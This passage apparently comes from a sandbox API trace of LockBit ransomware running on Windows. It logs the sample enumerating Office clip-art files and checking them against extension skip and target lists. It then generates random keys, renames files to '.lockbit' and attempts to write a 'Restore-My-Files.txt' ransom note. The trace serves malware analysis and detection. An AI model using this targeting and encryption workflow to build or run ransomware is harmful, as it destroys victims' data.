param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.682] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5ae8f450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00402_.WMF", cAlternateFileName="")) returned 1 [0179.682] lstrcmpiW (lpString1=".", lpString2="TR00402_.WMF") returned -1 [0179.682] lstrcmpiW (lpString1="..", lpString2="TR00402_.WMF") returned -1 [0179.682] PathFindExtensionW (pszPath="TR00402_.WMF") returned=".WMF" [0179.682] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.682] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.683] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.683] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00402_.WMF") returned -1 [0179.684] lstrcmpiW (lpString1="ntldr", lpString2="TR00402_.WMF") returned -1 [0179.684] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00402_.WMF") returned -1 [0179.684] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00402_.WMF") returned -1 [0179.684] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00402_.WMF") returned -1 [0179.684] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00402_.WMF") returned -1 [0179.684] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00402_.WMF") returned -1 [0179.684] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.684] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00402_.WMF") returned=".WMF" [0179.684] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.684] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.684] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.685] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.685] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.685] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.685] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.685] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.685] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.685] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.685] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00402_.WMF.lockbit") returned 72 [0179.685] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00402_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00402_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0179.687] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.687] malloc (_Size=0x40068) returned 0x3df0008 [0179.687] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2272) returned 1 [0179.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.688] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.689] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00402_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00402_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.690] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.690] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.692] free (_Block=0x1fa2ed8) [0179.692] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00402_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.693] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.693] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.693] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf396200, ftCreationTime.dwHighDateTime=0x1bd4c01, ftLastAccessTime.dwLowDateTime=0x5ae8f450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdf396200, ftLastWriteTime.dwHighDateTime=0x1bd4c01, nFileSizeHigh=0x0, nFileSizeLow=0x2054, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00482_.WMF", cAlternateFileName="")) returned 1 [0179.693] lstrcmpiW (lpString1=".", lpString2="TR00482_.WMF") returned -1 [0179.693] lstrcmpiW (lpString1="..", lpString2="TR00482_.WMF") returned -1 [0179.693] PathFindExtensionW (pszPath="TR00482_.WMF") returned=".WMF" [0179.693] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.693] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.694] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.694] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00482_.WMF") returned -1 [0179.695] lstrcmpiW (lpString1="ntldr", lpString2="TR00482_.WMF") returned -1 [0179.695] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00482_.WMF") returned -1 [0179.695] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00482_.WMF") returned -1 [0179.695] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00482_.WMF") returned -1 [0179.695] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00482_.WMF") returned -1 [0179.695] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00482_.WMF") returned -1 [0179.695] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.695] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00482_.WMF") returned=".WMF" [0179.695] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.695] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.695] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.696] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.696] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00482_.WMF.lockbit") returned 72 [0179.696] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00482_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00482_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0179.697] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.697] malloc (_Size=0x40068) returned 0x1ff1e60 [0179.697] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8276) returned 1 [0179.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0179.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.698] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0179.699] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0179.707] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00482_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00482_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.707] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.707] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.708] free (_Block=0x1fa2ed8) [0179.708] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00482_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.708] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.708] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd55d3200, ftCreationTime.dwHighDateTime=0x1bd4bf4, ftLastAccessTime.dwLowDateTime=0x5aeb55b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd55d3200, ftLastWriteTime.dwHighDateTime=0x1bd4bf4, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00494_.WMF", cAlternateFileName="")) returned 1 [0179.709] lstrcmpiW (lpString1=".", lpString2="TR00494_.WMF") returned -1 [0179.709] lstrcmpiW (lpString1="..", lpString2="TR00494_.WMF") returned -1 [0179.709] PathFindExtensionW (pszPath="TR00494_.WMF") returned=".WMF" [0179.709] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.709] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.710] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.710] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00494_.WMF") returned -1 [0179.710] lstrcmpiW (lpString1="ntldr", lpString2="TR00494_.WMF") returned -1 [0179.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00494_.WMF") returned -1 [0179.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00494_.WMF") returned -1 [0179.710] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00494_.WMF") returned -1 [0179.711] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00494_.WMF") returned -1 [0179.711] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00494_.WMF") returned -1 [0179.711] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.711] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00494_.WMF") returned=".WMF" [0179.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.711] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 